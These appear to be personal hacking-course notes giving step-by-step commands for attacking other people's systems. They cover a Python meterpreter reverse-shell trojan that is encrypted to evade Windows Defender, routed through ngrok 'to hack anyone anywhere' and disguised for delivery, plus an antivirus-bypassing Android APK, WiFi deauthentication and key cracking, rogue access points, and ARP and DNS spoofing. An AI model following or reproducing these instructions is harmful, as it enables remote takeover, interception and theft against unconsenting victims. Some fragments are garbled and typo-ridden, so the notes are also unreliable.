for every exploit, you have to go in with a payload set payloads

if you're getting a payload error, this is the step you'll follow;

- msfconsole

- search "product version"

- use {select exploit number}

- show payloads

- set payload {payload number}

- show options

- set RHOST {target ip}

- set LHOST {kali ip}

 - set LPORT 4444

- exploit

- sudo ufw allow 4444

Monday, 4th September, System Hacking

How to hack WindowsOS

Steps to creating a virus for windowsOS

We are going to ngrok. Ngrok is used for port forwarding. You can use it
to hack anyone anywhere.

- Start up your browser search for ngrok and create an account with
them and verify your email and then go on to download

- After downloading, unzip the file and follow the instructions of the
installation on the website. Note that under connect account, you will
add ./ at the beginning of the command and run it with sudo right and
without sudo right.

Some files will be given to you (NXcrypt and crypt_deliver). Copy

crypt_deliver to windows OS and NXCrypt to Linux OS.

NXcrypt is used for encrypting virus on Linux OS. It bypasses windows

defender and firewalls on the system. If it's encrypted, windows will not
be able to read the file and determine if it's a virus or not.

To start up ngrok;

- type in the command sudo ./ngrok tcp [kali.ip]:4444

Note: you can use any port number that is available on the system but
4444 is fine

you'll see an interface that'll bring something like

tcp://6.tcp.eu.ngrok.io:19449 -> [ip.address]:[port.number]

Note: 6.tcp.eu.ngrok.io above is LHOST of ngrok and 19449 is

LPORT of ngrok
- open a new terminal to create a virus

- type in the command;

msfvenom -p python/meterpreter/reverse_tcp
LHOST=[ngrok.ip] LPORT=[ngrok.port.no] -o
[/path.to.save/virus_name.py]

Note: the command above is used to create a remote access

trojan and the file you are creating must have python extension (i.e it
will have .py at the end)

Now, we are going to encrypt the virus

- open a new terminal and cd into the NXcrypt folder

- and run the command; sudo

./NXcrypt.py -f [virusname.py] -o [encrypted_virus_name.py) and
your virus is encrypted.

Note: this might give you permission error, if so - give the

virusname.py the permission to execute

For the virus you created to work, the system you intend to hack
must have a python interpreter installed on the system. So we are going
to couple it in a way that python will be automatically installed on the
system if python is not on it when the link is clicked.

To couple the virus

- go to your windows and extract crypt_deliver then copy the

encrypted trojan file into the folder

- then start up your command prompt as administrator and cd into the

crypt_deliver folder

- after you are in the folder, type in the command packer.bat

[encrypted_virus_name.py] python.msi

the command above will convert the virus into digital certificate

- you'll notice that in the crypt_deliver folder, you'll find a file named
payload_delivery, right click on it and click on edit
- after it opens on notepad, you'll find a command "hello.py" on the
page at the beginner and replace it with the encrypted virus you created
[encrypted_virus_name.py] and save it

- after saving it, close it and rename the file with something else
maybe (data_bot)

Now, we are going to see where we'll be controlling the victims machine
after they have clicked on the virus, that is where we will start up listener

to start up listener

- open up a new terminal on kali and start up msfconsole

- after msfconsole is up, type in the command use

exploit/multi/handler

- after that, type in the command; set

payload python/meterpreter/reverse_tcp

Note: this is the interpreter we used in creating our virus

- type in the command set LHOST [your.kali.ip]

- and also set LPORT [port.number]

- then type the command exploit after that

the next step is to allow ufw (firewall of the kernel), to do that

we use the command below to install ufw

- open up a new terminal and type in the command sudo apt install
ufw

- after installation, type in the command sudo ufw allow

[port.number]

How to hack AndroidOS

- Go to your kali browser and search EvilDroidNew github

- Click on the one for github and follow the instructions to install it and
after installation, run it

- Select 4 (Bypass AV APK) on the options and input your ip address

- Input your IP address (kali ip or Ngrok)

- Input your port number (eg 4444)

- Input your payload name

- Next, choose android/meterpreter/reverse_tcp as your payload

option

- Next, choose the first option (APK-MSF)

- The next option, will be icon. Then go to your browser and search for
a png image related to your payload name and save it in the
EvilDroidNew folder under icon

- Now, go to your terminal and select the png image and wait for it to
build

- After it builds, fill the stuffs that follows

you might get an error ([!] Failed to verify signed artifacts), if you do
get the error, run the following command

- open a new terminal

- sudo apt update

- sudo apt install openjdk-11-jdk-headless

- sudo apt install lib32z1

After you're done with the above process, now run EvilAndroidNew again

you might get an error ([!] Failed to align recompiled APK) again, to
fix this error, you'll go through the following process;

- start up your kali browser and search for "SDK build tool
download"

- go with the "download build tools for Android SDK

manager"
 - download the older version for linux

- after downloading, extract the file and copy it into

EvilDroidNew folder

- open it and go to the last file in the folder "zipalign"

- drag the file "zipalign" into the terminal

- now go back and open the evildroid file with mousepad

- scroll down and find "zipalign 4 evil.apk $apk_name.apk

2>&1" (it should be on line 618 or 620) and remove the zipalign in
front it

- now, go and copy the filepath and paste it at the front

and add ./ to the zipalign as in "/home/kali/Downloads/Evil-Droid-
NEW/android-4.4.2/./zipalign 4 evil.apk $apk_name.apk 2>&1"

Now, go back and run EvilDroidNew, it'll bring done and some options
and continue the following process

- select OK and select Multihandler (this will start up metasploit

framework for you)

The virus is build like this

- Now go to EvilDroid folder then go to evilapk - you'll see the virus

there and then you can send it to your android device

Note: the android device and your kali must be on the same
network and on bridge for you to be able to gain access.

For NAT user, you can use Ngrok ip address and port number to
access it.

Note: if you don't have android device, you can download NoxPlayer on
windows and install it.

to copy the apk into noxplayer, go through the following steps;

- go to kali and cd into the evilapk folder

- sudo chmod 777 [apk.name]

- sudo python3 -m http.server 8000

another terminal

- sudo ufw allow 8000

Project - doubletrouble

WIFI HACKING

- Input wireless card in monitor mode

- start up your terminal as root and type in the command airmon-ng

start wlan0 - this will start up monitor around

the next step now is to monitor wifi around, to do that. follow the process
below;

- start up a new terminal as root using sudo bash

- type in the command airodump-ng wlan0mon

you'll see the BSSID column, that is where the MAC addresses are

the CH is the Channel column and the ESSID is the wifi/hotspot name

- capture Packet and save to disk

- open a new terminal and login as root

- type in the command airodump-ng --channel [channel no] -w

[/path to save] --bssid [mac address] wlan0mon and this will bring
out another interface.

get the MAC address on the station and save it somewhere coz it
won't allow you to copy
Now, the next step is to perform a deauthentication attack to capture the
pre-shared key

- start up your terminal and login as root

- type in the comand -aireplay-ng --deauth 5 -a

[wifi.mac.address] -c [station.mac.address] wlan0mon

the next step now is to crack the pre-shared key using crunch. and
crunch has a character set in the path /usr/share/crunch/charset.lst

- crunch [min.len] [max.len] -f [/path.to.character_set] -o

[/path.to.save]

we cannot save this file since the size is large, so what we are going to do
is tell crunch to use it immediately as it is generating it instead of saving
it. to do that;

- log in to terminal as root

- crunch [min.len] [max.len] -f /usr/share/crunch/charset.lst

numeric | aircrack-ng --bssid [wifi.mac.address] -w-
[/path.bssid.is.saved]

ROGUE ACCESS POINT

- Plug in your network adapter

- open a new terminal and login as root

- type in the command airmon-ng start wlan0 - this will create a

monitor mode

- open a new terminal and login as root then type in the command
airbase -ng -e [wifi.name] -c [channel.no] [mon]

at this point, you cannot access the wifi yet so we are going to
configure it now

- open a new terminal and login as root then type in the command
ifconfig at0 up
after this, open the dhcp configuration file

- open a new terminal as root and type in the command ifconfig at0
[gateway.ip] netmask [subnetmask.ip]

- open a new terminal as root and type route add -net [network.ip]
netmask [subnetmask.ip] gw [gateway.ip]

the next step now is to install the dhcp server. the dhcp server is the one
that will give the victims ip address. to install; below

- open a new terminal and type in the command sudo apt-get install
isc-dhcp-server

after installation, the next step is to start up our dhcp server, to do that;

- open a new terminal as root and type in the command dhcpd -d -f -

cf [/path.to.dhcpd configuration file] at0

after, configuration, you will be able to connect to the network. the next
step is to give it internet connection

- open a new terminal as root and type in the command iptables -P

FORWARD ACCEPT ; this command is used to enable ip forward on the
firewall

- type in the command echo "1" > /proc/sys/net/ipv4/ip_forward -

this will enable ip forward on the host

the next step is (here you need two interface)

- open a new terminal as root and type iptables -t nat -A

POSTROUTING -o [network.interface] -j MASQUERADE

ROQUE ACCESS POINT WITH DIFFERENT TOOL (HOST APD)

- open up your terminal and update your repository

- the next step is to install hostapd, to install hostapd - type in the

command sudo apt-get install hostapd

- next you cd into /etc/hostapd and copy the hostapd.conf file into the
path

- next cd into /etc/default/ and open the file hostapd

- after opening the file, add the path to your hostapd configuration file
to the DEAMON_CONF=

after that, save it and close the file

- next step is open a new terminal and login as root and switch you
network card to monitor mode

- next step is to start up hostapd with the command systemctl

unmask hostapd (Note that you'll be running the command in root)

- next, you'll run the command systemctl enable hostapd (if you
check your wifi, you'll see the name of your wifi)

- now, the next step is configure the wifi using the command ifconfig
[interface] [gw.ip] netmask [subnetmask.ip] - run is as root

- next the command route add -net [network.ip] netmask

[subnetmask.ip] gw [gateway.ip]

next step is to start up dhcp server;

- open a new terminal and login as root then type in the command
dhcpd -d -f -cf [/path to dhcpd config file] [interface] - this will start
up the dhcp server

- open a new terminal with root and run the command iptables -P
FORWARD ACCEPT

- next the command iptables -t nat -A POSTROUTING -o

[interface.connected to internet] -j MASQUERADE

- next echo "1" > /proc/sys/net/ipv4/ip_forward

after this command, this will give the access point (fake wifi) internet
access

Next step is to snif on the interface

to start sniffing on the wifi, you'll follow steps below;

- open wireshark and start sniffing on the interface (wlan0mon)

sslstrip

sss7

MAN-IN-THE-MIDDLE-ATTACK & DNS SPOOFING

Man in the middle attack is when an attacker places himself in the middle
to intercept information. MITM attack is very dangerous.

The concept of MITM attack is that it carry out ARP spoofing

ARP - Address Resolution Protocol; it is used to map IP address to MAC

address. the ARP protocol has what we called ARP table which consist of
IP address and MAC address.

ARP poisoning updates the ARP table with fake IP address and MAC
addresses.

we'll be using ETTERCAP and ARPSPOOF tool.

- type ettercap --help to check if ettercap is installed

- to start up ettercap, open your terminal and type ettercap -G

- next is to install arpspoof using the command sudo apt install

dsniff

before we use ettercap, we'll have to do some configuration. to do that,

cd into /etc/ettercap you'll find a file etter.conf and open it. At the
beginning of the conf file, you'll see uid and gid, change it root i.e 0 and
save

Scroll through the file until you see LINUX and you'll see #redir line,
remove the hash before the redir line on the four of them and save it

next is to configure the dns server, you open etter.dns file again and
scroll to the last page and type in the command

[domain to spoof] [A record] [ip.address of host]

[timetoleave(TTLvalue)] as in
hiitplc.com A 192.168.2.120 65535

*.hiitplc.com A 192.168.2.120 65535

www.hiitplc.com A 192.168.2.120 65535

after you've input this, SAVE.

After that, cd into /etc and open the hosts file and you'll fine the IP
address for localhost and kali - Add # in the front of the ipaddress of
localhost and kali and add your ip address to the next line and domain
name you want to spoof as in; 192.168.2.120 hiitplc.com
www.hiitplc.com *.hiitplc.com

the final configuration is to cd into /etc and open the file hostname and
delete kali then put the domain name you want to spoof there. (Note: you
can only put one domain name here)

- open a new terminal and login as root

- run the command arpspoof -i [interface] -t [gateway.ip] -c both

-r [target.ip]

-c is for mac address, the options you have is own/host or you can
set it to both

after this

- open a new terminal and login as root

- run the command arpspoof -i [interface] -t [target.ip] -c both -r

[gateway.ip]

the next step is to give it internet access. to do that;

- open a new terminal and login as root

- run the command ettercap -G to start ettercap

- open a new terminal and login as root

- type in the command iptables -P FORWARD ACCEPT

- echo "1" > /proc/sys/net/ipv4/ip_forward

- sudo service apache2 start

- sudo ufw allow 53

route -n to check your network gateway